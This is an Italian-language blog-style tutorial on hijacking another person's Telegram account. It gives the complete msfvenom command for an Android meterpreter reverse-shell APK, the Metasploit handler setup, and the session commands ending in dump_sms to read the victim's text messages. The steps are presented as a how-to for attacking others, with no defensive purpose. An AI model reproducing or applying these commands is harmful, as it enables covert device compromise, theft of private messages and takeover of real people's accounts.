Telegram, insieme a Whatsapp, è una delle piattaforme di messaggistica più usate nel mondo. Sì, se ve lo state chiedendo si considerano anche gli hacker russi, terroristi e compagnia bella.
Tutti parlano di sicurezza, crittografia di qua, crittografia di là, ma la realtà... è un altra.
TAN TAN TAAAAAN!
A parte gli scherzi, il punto non è la crittografia, ma bensì il punto debole è un altro.
E ci puoi credere o meno, ma per hackerare il profilo Telegram di una persona, ci vogliono solo 20 minuti!
E quanto ci vuole per fare una cosa di 20 minuti? 20 minuti!
Allora, iniziamo!
REQUISITI:
- Computer con un qualsiasi sistema operativo
- Ultima versione di Metasploit Framework che trovi qui: METASPLOIT
- 1) Creazione della backdoor
iniziamo a creare il nostro file apk infetto.infatti Metasploit mette a disposizione anche il modulo per la creazione di file apk. Apriamo il terminale e digitiamo:
- msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip_macchina_attaccante] LPORT=[porta_per_la_connessione] R > [nome_file].apk
Il payload è pronto, non ci resta che portarlo sul dispositivo mobile.
2)Impostare L'handler
Disattivato il controllo delle fonti sicure sul dispositivo, avviamo msfconsole con il comando msfconsole e impostiamo un handler generico per android
- msfconsole
- use exploit/multi/handler
- set PAYLOAD android/meterpreter/reverse_tcp
- set LHOST [ip_macchina_attaccante]
- set LPORT [porta_per_la_connessione]
3)Lanciare l'exploit e collegarsi al dispositivo
lanciamo il nostro exploit digitando
- exploit
e installiamo l'apk infetto sul dispositivo.
una volta fatto digitiamo
- sessions -l
- sessions -i [numero sessione]
- dump_sms